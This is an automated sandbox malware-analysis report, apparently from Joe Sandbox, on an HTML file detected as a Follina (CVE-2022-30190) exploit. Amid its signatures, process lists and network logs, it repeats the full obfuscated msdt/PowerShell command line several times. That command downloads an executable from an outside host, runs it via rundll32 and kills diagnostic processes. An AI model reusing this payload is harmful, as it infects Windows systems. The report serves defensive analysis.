Windows Analysis Report
fbGUvJ4AdV.html

Overview

General Information

Sample Name: fbGUvJ4AdV.html
Analysis ID: 696621
MD5: da3469806af3aacbbbd22a763343fff2
SHA1: 6d9fd23a4d32a5963c24d39b5402eeaf2a54f093
SHA256: c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1
Tags: CVE-2022-30190Exploithtml
Infos:

Detection

Follina CVE-2022-30190
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: fbGUvJ4AdV.html Virustotal: Detection: 11% Perma Link

Exploits
barindex
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Source: Yara match File source: 00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater Jump to behavior
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown DNS traffic detected: queries for: clients2.google.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
Source: fbGUvJ4AdV.html Virustotal: Detection: 11%
Source: C:\Windows\System32\msdt.exe File created: C:\Users\user\AppData\Local\Temp\msdtadmin Jump to behavior
Source: C:\Windows\System32\msdt.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: classification engine Classification label: mal56.expl.winHTML@39/0@4/9
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\GoogleUpdater Jump to behavior
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe File opened: C:\Windows\system32\MSFTEDIT.DLL Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater Jump to behavior
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: fbGUvJ4AdV.html String : entropy: 5.72, length: 262, content: "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ Go to definition
Source: fbGUvJ4AdV.html String : entropy: 5.27, length: 145, content: "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUo Go to definition
Source: fbGUvJ4AdV.html String : entropy: 5.31, length: 116, content: "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGU Go to definition
Source: fbGUvJ4AdV.html String : entropy: 5.44, length: 148, content: "RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3A Go to definition
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\msdt.exe Window / User API: threadDelayed 2734 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22 Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 696621 Sample: fbGUvJ4AdV.html Startdate: 02/09/2022 Architecture: WINDOWS Score: 56 28 Multi AV Scanner detection for submitted file 2->28 30 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->30 6 chrome.exe 18 13 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 16 192.168.2.1 unknown unknown 6->16 18 192.168.2.23 unknown unknown 6->18 20 3 other IPs or domains 6->20 11 chrome.exe 6->11         started        14 msdt.exe 8 6->14         started        process5 dnsIp6 22 www.google.com 172.217.168.36, 443, 49756, 49810 GOOGLEUS United States 11->22 24 clients.l.google.com 172.217.168.78, 443, 49749 GOOGLEUS United States 11->24 26 3 other IPs or domains 11->26
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
216.58.215.237
 accounts.google.com United States
15169 GOOGLEUS false
172.217.168.78
 clients.l.google.com United States
15169 GOOGLEUS false
172.217.168.36
 www.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false

Private

IP
192.168.2.1
192.168.2.4
192.168.2.5
192.168.2.23
127.0.0.1

Contacted Domains

Name IP Active
accounts.google.com 216.58.215.237 true
www.google.com 172.217.168.36 true
clients.l.google.com 172.217.168.78 true
clients2.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 false
    		high
    https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard false
      		high